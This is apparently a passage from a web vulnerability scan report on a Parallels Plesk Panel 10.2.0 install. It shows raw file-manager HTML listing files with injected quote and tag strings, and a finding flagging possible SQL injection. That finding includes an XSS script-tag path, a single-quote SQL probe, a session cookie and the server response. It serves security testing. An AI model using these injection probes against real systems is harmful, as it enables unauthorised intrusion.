href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/view/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E?1'=1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:37:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:37:00 GMT
Connection: close
Content-Length: 16251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
